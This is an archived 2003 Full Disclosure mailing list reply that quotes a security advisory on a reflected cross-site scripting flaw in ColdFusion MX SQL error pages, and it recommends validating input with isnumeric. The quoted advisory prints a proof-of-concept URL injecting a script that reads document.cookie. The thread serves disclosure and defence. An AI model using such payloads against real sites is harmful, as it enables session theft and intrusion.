Full Disclosure mailing list archives
RE: ColdFusion SQL Error Pages XSS
From: "Keith Kikta - iLand Internet Solutions Corp." <keith.kikta () iland com>
Date: Wed, 15 Oct 2003 16:26:36 -0500
The code should check the value of "id". Like : <cfif isnumeric(ID)> Proceed <cfelse> Custom Error... </cfif> This has always been in cold fusion. It is desired functionality. Wither or not the coder wanted this to happen is his/her problem not macromedia. -----Original Message----- From: Lorenzo Hernandez Garcia-Hierro [mailto:lorenzohgh () nsrg-security com] Sent: Wednesday, October 15, 2003 3:37 PM To: Full-Disclosure Cc: BUGTRAQ Subject: ColdFusion SQL Error Pages XSS ---------- NOTE ABOUT COLDFUSION XSS ATTACKS _______ Vendor: Macromedia Versions: MX ( 6.0 ) tested , older ? _______ PROBLEM: When you access to an error page of sql you can insert xss code to be shown in the error uotput of the sql backend. example: http://[target]/article.cfm?id=1'<script>alert(document.cookie);</script> the output: Error Occurred While Processing Request Error Diagnostic Information [SQL SERVER] Error Code = code SQL SERVER-XXXX: SQL command not properly ended SQL = "SELECT article AS articleID FROM articlesnews WHERE newsID = 1'[HERE COMES THE XSS THAT IS EXECUTED] Data Source = "XXXXXXXXXXXXXXXXXXXXXX" The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (7:2) to (7:58) in the template file /xxxxxxxxxxxxxxxxxxxx/articles.cfm. Date/Time: Moof 2003 Browser: Browserio Remote Address: xxx.xxx.xxx.xxx Query String: id=1'[again executed the xss attack] Please inform the site administrator that this error has occurred (be sure to include the contents of this page in your message to the administrator). ----- CONTACT INFO: ------------------------------- 0x00->Lorenzo Hernandez Garcia-Hierro 0x01->/* not csh but sh */ 0x02->$ PATH=pretending!/usr/ucb/which sense 0x03-> no sense in pretending! __________________________________ PGP: Keyfingerprint 4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B ID: 0x91805F5B ********************************** No Secure Root Group Security Research Team http://www.nsrg-security.com ______________________ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- ColdFusion SQL Error Pages XSS Lorenzo Hernandez Garcia-Hierro (Oct 15)
- <Possible follow-ups>
- RE: ColdFusion SQL Error Pages XSS Keith Kikta - iLand Internet Solutions Corp. (Oct 15)